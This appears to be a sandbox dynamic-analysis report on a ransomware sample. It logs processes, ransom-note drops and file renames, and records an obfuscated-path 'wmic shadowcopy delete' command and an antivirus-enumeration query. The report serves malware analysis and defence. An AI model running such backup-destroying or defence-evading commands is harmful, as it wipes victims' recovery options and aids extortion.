f9dfdce8...2a74 | Grouped Behavior
VTI SCORE: 100/100
Dynamic Analysis Report
Classification: Ransomware, Trojan

Remarks (1/1)

(0x2000002): The maximum VM disk space was reached. The analysis was terminated prematurely.

Remarks

(0x200001f): Code in memory was overwritten during this analysis. Review corresponding VTI for more info.

Monitored Processes

Process Overview
ID PID Monitor Reason Integrity Level Image Name Command Line Origin ID
#1 0xa38 Analysis Target High (Elevated) test.exe "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\test.exe" -
#2 0x36c RPC Server System (Elevated) svchost.exe C:\Windows\system32\svchost.exe -k netsvcs #1
#4 0xa78 Child Process High (Elevated) wmic.exe "C:\m\..\Windows\ovxhp\sff\qyv\..\..\..\system32\w\sfc\roma\..\..\..\wbem\ux\dgfg\..\..\wmic.exe" shadowcopy delete #1
#5 0xae8 RPC Server System (Elevated) wmiprvse.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding #2
#6 0xb08 RPC Server System (Elevated) vssvc.exe C:\Windows\system32\vssvc.exe #5

Behavior Information - Grouped by Category

Process #1: test.exe
Information Value
ID #1
File Name c:\users\5p5nrgjn0js halpmcxz\desktop\test.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\test.exe"
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:31, Reason: Analysis Target
Unmonitor End Time: 00:01:15, Reason: Terminated by Timeout
Monitor Duration 00:00:44
OS Process Information
Information Value
PID 0xa38
Parent PID 0x45c (c:\windows\explorer.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs 0xA3C, 0xA48, 0xA4C, 0xA50, 0xA54, 0xA58, 0xA6C, 0xA70, 0xA74, 0xA80, 0xA84, 0xAD0, 0xAD4
Memory Dumps
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points AV YARA Actions
test.exe 0x00400000 0x00459FFF Relevant Image - 32-bit - True False
Hook Information
Type Installer Target Size Information Actions
Code test.exe:+0x32363 ntdll.dll:DbgUiRemoteBreakin+0x0 1 bytes -
Dropped Files
Filename | File Size | YARA Match
C:\Boot\BOOTSTAT.DAT | 64.26 KB | False
C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\boot.sdi | 3.02 MB | False
C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim | 161.38 MB | False
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\AdobeCMapFnt10.lst | 34.55 KB | False
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\AdobeSysFnt10.lst | 135.47 KB | False
C:\\DECRYPT-FILES.html | 6.43 KB | False
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\Cache\AcroFnt10.lst | 52.20 KB | False
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\SharedDataEvents | 5.26 KB | False
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\UserCache.bin | 75.92 KB | False
Modified Files
Filename | File Size | YARA Match
C:\Boot\BOOTSTAT.DAT | 64.26 KB | False
C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\boot.sdi | 3.02 MB | False
C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim | 161.38 MB | False
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\AdobeCMapFnt10.lst | 34.55 KB | False
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\AdobeSysFnt10.lst | 135.47 KB | False
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\Cache\AcroFnt10.lst | 52.20 KB | False
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\SharedDataEvents | 5.26 KB | False
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\UserCache.bin | 75.92 KB | False
Host Behavior
COM (3)
Operation Class Interface Additional Information Success Count Logfile
Create WBEMLocator IWbemLocator cls_context = CLSCTX_INPROC_SERVER True 1
Execute WBEMLocator IWbemLocator method_name = ConnectServer, network_resource = root\SecurityCenter2 True 1
Execute WBEMLocator IWbemServices method_name = ExecQuery, query_language = WQL, query = Select * From AntiVirusPr True 1
File (565)
Operation Filename Additional Information Success Count Logfile
Create C:\ProgramData\foo.db desired_access = GENERIC_READ False 1
Create C:\ProgramData\foo.db desired_access = GENERIC_WRITE True 1
Create C:\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Create C:\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Create C:\$Recycle.Bin\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Create C:\$Recycle.Bin\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Create C:\$Recycle.Bin\S-1-5-21-3388679973-3930757225-3770151564-1000\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Create C:\$Recycle.Bin\S-1-5-21-3388679973-3930757225-3770151564-1000\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Create C:\$Recycle.Bin\S-1-5-21-3388679973-3930757225-3770151564-1000\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\$Recycle.Bin\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\Boot\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Create C:\Boot\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Create C:\Boot\BCD desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\Boot\BCD.LOG desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\Boot\BCD.LOG1 desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Create C:\Boot\BCD.LOG2 desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Create C:\Boot\BOOTSTAT.DAT desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Create C:\Boot\cs-CZ\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Create C:\Boot\cs-CZ\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Create C:\Boot\cs-CZ\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\Boot\cs-CZ\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\Boot\da-DK\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Create C:\Boot\da-DK\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Create C:\Boot\da-DK\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\Boot\da-DK\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\Boot\de-DE\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Create C:\Boot\de-DE\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Create C:\Boot\de-DE\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\Boot\de-DE\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\Boot\el-GR\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Create C:\Boot\el-GR\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Create C:\Boot\el-GR\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\Boot\el-GR\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\Boot\en-US\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Create C:\Boot\en-US\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Create C:\Boot\en-US\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\Boot\en-US\memtest.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\Boot\en-US\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\Boot\es-ES\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Create C:\Boot\es-ES\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Create C:\Boot\es-ES\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\Boot\es-ES\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\Boot\fi-FI\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Create C:\Boot\fi-FI\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Create C:\Boot\fi-FI\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\Boot\fi-FI\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\Boot\Fonts\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Create C:\Boot\Fonts\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Create C:\Boot\Fonts\chs_boot.ttf desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\Boot\Fonts\cht_boot.ttf desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\Boot\Fonts\jpn_boot.ttf desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\Boot\Fonts\kor_boot.ttf desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\Boot\Fonts\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\Boot\Fonts\wgl4_boot.ttf desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\Boot\fr-FR\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Create C:\Boot\fr-FR\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Create C:\Boot\fr-FR\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\Boot\fr-FR\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\Boot\hu-HU\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Create C:\Boot\hu-HU\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Create C:\Boot\hu-HU\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\Boot\hu-HU\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\Boot\it-IT\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Create C:\Boot\it-IT\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Create C:\Boot\it-IT\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\Boot\it-IT\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\Boot\ja-JP\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Create C:\Boot\ja-JP\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Create C:\Boot\ja-JP\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\Boot\ja-JP\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\Boot\ko-KR\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Create C:\Boot\ko-KR\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Create C:\Boot\ko-KR\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\Boot\ko-KR\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\Boot\memtest.exe desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\Boot\nb-NO\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Create C:\Boot\nb-NO\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Create C:\Boot\nb-NO\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\Boot\nb-NO\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\Boot\nl-NL\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Create C:\Boot\nl-NL\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Create C:\Boot\nl-NL\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\Boot\nl-NL\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\Boot\pl-PL\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Create C:\Boot\pl-PL\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Create C:\Boot\pl-PL\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\Boot\pl-PL\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\Boot\pt-BR\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Create C:\Boot\pt-BR\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Create C:\Boot\pt-BR\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\Boot\pt-BR\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\Boot\pt-PT\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Create C:\Boot\pt-PT\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Create C:\Boot\pt-PT\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\Boot\pt-PT\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\Boot\ru-RU\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Create C:\Boot\ru-RU\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Create C:\Boot\ru-RU\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\Boot\ru-RU\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\Boot\sv-SE\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Create C:\Boot\sv-SE\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Create C:\Boot\sv-SE\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\Boot\sv-SE\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\Boot\tr-TR\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Create C:\Boot\tr-TR\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Create C:\Boot\tr-TR\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\Boot\tr-TR\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\Boot\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\Boot\zh-CN\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Create C:\Boot\zh-CN\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Create C:\Boot\zh-CN\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\Boot\zh-CN\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\Boot\zh-HK\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Create C:\Boot\zh-HK\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Create C:\Boot\zh-HK\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\Boot\zh-HK\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\Boot\zh-TW\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Create C:\Boot\zh-TW\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Create C:\Boot\zh-TW\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\Boot\zh-TW\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\bootmgr desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\Config.Msi\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Create C:\Config.Msi\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Create C:\Config.Msi\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\Documents and Settings\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Create C:\Documents and Settings\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Create C:\hiberfil.sys desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\MSOCache\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Create C:\MSOCache\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Create C:\MSOCache\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\pagefile.sys desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\PerfLogs\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Create C:\PerfLogs\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Create C:\PerfLogs\Admin\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Create C:\PerfLogs\Admin\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Create C:\PerfLogs\Admin\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\PerfLogs\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\Recovery\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Create C:\Recovery\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Create C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Create C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Create C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\boot.sdi desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Create C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Create C:\Recovery\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\System Volume Information\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE False 1
Create C:\System Volume Information\\DECRYPT-FILES.html desired_access = GENERIC_WRITE False 1
Create C:\Users\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Create C:\Users\\DECRYPT-FILES.html desired_access = GENERIC_WRITE False 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\AdobeCMapFnt10.lst desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\AdobeSysFnt10.lst desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\Cache\\wevkgn5.dat file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\Cache\\DECRYPT-FILES.html desired_access = GENERIC_WRITE True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\Cache\AcroFnt10.lst desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\Cache\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\SharedDataEvents desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\UserCache.bin desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\wevkgn5.dat desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Get Info C:\Boot\BCD.LOG1 type = size, size_out = 0 True 1
Get Info C:\Boot\BCD.LOG2 type = size, size_out = 0 True 1
Get Info C:\Boot\BOOTSTAT.DAT type = size, size_out = 65536 True 1
Get Info C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\boot.sdi type = size, size_out = 3170304 True 1
Get Info C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim type = size, size_out = 169213970 True 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\AdobeCMapFnt10.lst type = size, size_out = 35116 True 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\AdobeSysFnt10.lst type = size, size_out = 138459 True 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\Cache\AcroFnt10.lst type = size, size_out = 53188 True 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\SharedDataEvents type = size, size_out = 5120 True 1
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\UserCache.bin type = size, size_out = 77477 True 1
Move C:\Boot\BOOTSTAT.DAT.R0GsRvs source_filename = C:\Boot\BOOTSTAT.DAT True 1
Move C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\boot.sdi.XvZHI source_filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\boot.sdi True 1
Move C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim.9emKr source_filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim True 1
Move C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\AdobeCMapFnt10.lst.wHLcdW source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\AdobeCMapFnt10.lst True 1
Move C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\AdobeSysFnt10.lst.34tSh1K source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\AdobeSysFnt10.lst True 1
Move C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\Cache\AcroFnt10.lst.iHt9 source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\Cache\AcroFnt10.lst True 1
Move C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\SharedDataEvents.6PFi source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\SharedDataEvents True 1
Move C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\UserCache.bin.KH4Dw9W source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe\Acrobat\10.0\UserCache.bin True 1
Read C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim size = 264, size_out = 264 True 1
Read C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim size = 1048576, size_out = 1048576 True 161
